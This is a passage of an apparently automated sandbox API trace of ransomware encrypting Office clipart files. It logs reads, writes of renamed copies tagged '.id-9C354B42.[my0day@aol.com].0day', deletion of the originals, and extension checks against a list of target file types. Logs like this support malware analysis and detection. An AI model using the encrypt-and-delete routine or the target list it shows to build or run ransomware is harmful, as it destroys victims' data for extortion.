lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0273.042] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=42992) returned 1 [0273.042] CloseHandle (hObject=0x390) returned 1 [0273.042] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf")) returned 0x20 [0273.086] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0273.087] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.087] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0273.088] GetLastError () returned 0x0 [0273.088] ReadFile (in: hFile=0x2cc, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0xa7f0, lpOverlapped=0x0) returned 1 [0273.133] WriteFile (in: hFile=0x2c4, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xa800, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xa800, lpOverlapped=0x0) returned 1 [0273.135] ReadFile (in: hFile=0x2cc, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.135] WriteFile (in: hFile=0x2c4, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.135] SetEndOfFile (hFile=0x2c4) returned 1 [0273.135] CloseHandle (hObject=0x2c4) returned 1 [0273.135] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.135] SetEndOfFile (hFile=0x2cc) returned 1 [0273.139] CloseHandle (hObject=0x2cc) returned 1 [0273.139] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.151] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf")) returned 1 [0273.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0273.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0273.151] lstrlenW (lpString=".doc") returned 4 [0273.151] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.151] lstrlenW (lpString=".docx") returned 5 [0273.152] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.152] lstrlenW (lpString=".pdf") returned 4 [0273.152] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.152] lstrlenW (lpString=".xls") returned 4 [0273.152] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.161] lstrlenW (lpString=".xlsx") returned 5 [0273.161] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.161] lstrlenW (lpString=".ppt") returned 4 [0273.161] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0273.161] lstrlenW (lpString=".zip") returned 4 [0273.161] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.161] lstrlenW (lpString=".rar") returned 4 [0273.161] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.161] lstrlenW (lpString=".bz2") returned 4 [0273.162] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.162] lstrlenW (lpString=".7z") returned 3 [0273.162] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0273.162] lstrlenW (lpString=".dbf") returned 4 [0273.162] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0273.162] lstrlenW (lpString=".1cd") returned 4 [0273.162] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0273.162] lstrlenW (lpString=".jpg") returned 4 [0273.162] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0273.162] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0273.162] lstrlenW (lpString=".doc") returned 4 [0273.162] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.162] lstrlenW (lpString=".docx") returned 5 [0273.162] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.162] lstrlenW (lpString=".pdf") returned 4 [0273.162] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.163] lstrlenW (lpString=".xls") returned 4 [0273.163] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.163] lstrlenW (lpString=".xlsx") returned 5 [0273.163] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.163] lstrlenW (lpString=".ppt") returned 4 [0273.163] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0273.163] lstrlenW (lpString=".zip") returned 4 [0273.163] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.163] lstrlenW (lpString=".rar") returned 4 [0273.163] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.163] lstrlenW (lpString=".bz2") returned 4 [0273.163] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.163] lstrlenW (lpString=".7z") returned 3 [0273.163] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0273.163] lstrlenW (lpString=".dbf") returned 4 [0273.163] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0273.163] lstrlenW (lpString=".1cd") returned 4 [0273.163] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.163] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0273.163] lstrlenW (lpString=".jpg") returned 4 [0273.163] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.163] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0273.163] lstrlenW (lpString="DD01015_.WMF") returned 12 [0273.163] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0273.164] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=2226) returned 1 [0273.164] CloseHandle (hObject=0x394) returned 1 [0273.164] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf")) returned 0x20 [0273.164] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0273.164] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.164] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.165] GetLastError () returned 0x0 [0273.165] ReadFile (in: hFile=0x394, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x8b2, lpOverlapped=0x0) returned 1 [0273.173] WriteFile (in: hFile=0x380, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0x8c0, lpOverlapped=0x0) returned 1 [0273.174] ReadFile (in: hFile=0x394, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.174] WriteFile (in: hFile=0x380, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.174] SetEndOfFile (hFile=0x380) returned 1 [0273.174] CloseHandle (hObject=0x380) returned 1 [0273.174] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.174] SetEndOfFile (hFile=0x394) returned 1 [0273.176] CloseHandle (hObject=0x394) returned 1 [0273.176] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.177] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01015_.wmf")) returned 1 [0273.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0273.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0273.177] lstrlenW (lpString=".doc") returned 4 [0273.177] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.177] lstrlenW (lpString=".docx") returned 5 [0273.177] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.177] lstrlenW (lpString=".pdf") returned 4 [0273.177] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.177] lstrlenW (lpString=".xls") returned 4 [0273.177] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.177] lstrlenW (lpString=".xlsx") returned 5 [0273.177] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.177] lstrlenW (lpString=".ppt") returned 4 [0273.177] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0273.177] lstrlenW (lpString=".zip") returned 4 [0273.177] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.177] lstrlenW (lpString=".rar") returned 4 [0273.177] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.177] lstrlenW (lpString=".bz2") returned 4 [0273.177] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.177] lstrlenW (lpString=".7z") returned 3 [0273.177] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0273.177] lstrlenW (lpString=".dbf") returned 4 [0273.177] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.177] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0273.178] lstrlenW (lpString=".1cd") returned 4 [0273.178] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0273.178] lstrlenW (lpString=".jpg") returned 4 [0273.178] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0273.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0273.178] lstrlenW (lpString=".doc") returned 4 [0273.178] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.178] lstrlenW (lpString=".docx") returned 5 [0273.178] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.178] lstrlenW (lpString=".pdf") returned 4 [0273.178] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.178] lstrlenW (lpString=".xls") returned 4 [0273.178] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.178] lstrlenW (lpString=".xlsx") returned 5 [0273.178] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.178] lstrlenW (lpString=".ppt") returned 4 [0273.178] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0273.178] lstrlenW (lpString=".zip") returned 4 [0273.178] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.178] lstrlenW (lpString=".rar") returned 4 [0273.178] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.178] lstrlenW (lpString=".bz2") returned 4 [0273.178] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.178] lstrlenW (lpString=".7z") returned 3 [0273.178] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0273.178] lstrlenW (lpString=".dbf") returned 4 [0273.178] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0273.178] lstrlenW (lpString=".1cd") returned 4 [0273.178] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.178] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01015_.WMF") returned 63 [0273.178] lstrlenW (lpString=".jpg") returned 4 [0273.178] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.179] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0273.179] lstrlenW (lpString="DD01138_.WMF") returned 12 [0273.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0273.179] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=3692) returned 1 [0273.179] CloseHandle (hObject=0x394) returned 1 [0273.179] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf")) returned 0x20 [0273.179] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.179] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0273.179] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.179] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.180] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.180] GetLastError () returned 0x0 [0273.180] ReadFile (in: hFile=0x394, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0xe6c, lpOverlapped=0x0) returned 1 [0273.579] WriteFile (in: hFile=0x380, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xe70, lpOverlapped=0x0) returned 1 [0273.580] ReadFile (in: hFile=0x394, lpBuffer=0x35c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e6fed4, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesRead=0x2e6fed4*=0x0, lpOverlapped=0x0) returned 1 [0273.580] WriteFile (in: hFile=0x380, lpBuffer=0x35c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x35c0020*, lpNumberOfBytesWritten=0x2e6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.580] SetEndOfFile (hFile=0x380) returned 1 [0273.580] CloseHandle (hObject=0x380) returned 1 [0273.580] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e6fec8 | out: lpNewFilePointer=0x0) returned 1 [0273.580] SetEndOfFile (hFile=0x394) returned 1 [0273.584] CloseHandle (hObject=0x394) returned 1 [0273.584] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.585] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01138_.wmf")) returned 1 [0273.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0273.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0273.585] lstrlenW (lpString=".doc") returned 4 [0273.585] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.585] lstrlenW (lpString=".docx") returned 5 [0273.585] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.585] lstrlenW (lpString=".pdf") returned 4 [0273.585] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.585] lstrlenW (lpString=".xls") returned 4 [0273.585] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.585] lstrlenW (lpString=".xlsx") returned 5 [0273.585] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.585] lstrlenW (lpString=".ppt") returned 4 [0273.585] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0273.585] lstrlenW (lpString=".zip") returned 4 [0273.585] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.585] lstrlenW (lpString=".rar") returned 4 [0273.585] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.585] lstrlenW (lpString=".bz2") returned 4 [0273.585] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.585] lstrlenW (lpString=".7z") returned 3 [0273.585] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0273.585] lstrlenW (lpString=".dbf") returned 4 [0273.585] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0273.585] lstrlenW (lpString=".1cd") returned 4 [0273.585] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0273.585] lstrlenW (lpString=".jpg") returned 4 [0273.586] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0273.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0273.586] lstrlenW (lpString=".doc") returned 4 [0273.586] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.586] lstrlenW (lpString=".docx") returned 5 [0273.586] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.586] lstrlenW (lpString=".pdf") returned 4 [0273.586] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.586] lstrlenW (lpString=".xls") returned 4 [0273.586] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.586] lstrlenW (lpString=".xlsx") returned 5 [0273.586] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.586] lstrlenW (lpString=".ppt") returned 4 [0273.586] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0273.586] lstrlenW (lpString=".zip") returned 4 [0273.586] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.586] lstrlenW (lpString=".rar") returned 4 [0273.586] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.586] lstrlenW (lpString=".bz2") returned 4 [0273.586] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.586] lstrlenW (lpString=".7z") returned 3 [0273.586] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0273.586] lstrlenW (lpString=".dbf") returned 4 [0273.586] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0273.586] lstrlenW (lpString=".1cd") returned 4 [0273.586] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01138_.WMF") returned 63 [0273.586] lstrlenW (lpString=".jpg") returned 4 [0273.586] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.587] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0273.587] lstrlenW (lpString="DD01139_.WMF") returned 12 [0273.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.602] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2e6ff1c | out: lpFileSize=0x2e6ff1c*=3632) returned 1 [0273.602] CloseHandle (hObject=0x39c) returned 1 [0273.602] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf")) returned 0x20 [0273.607] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01139_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01139_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff 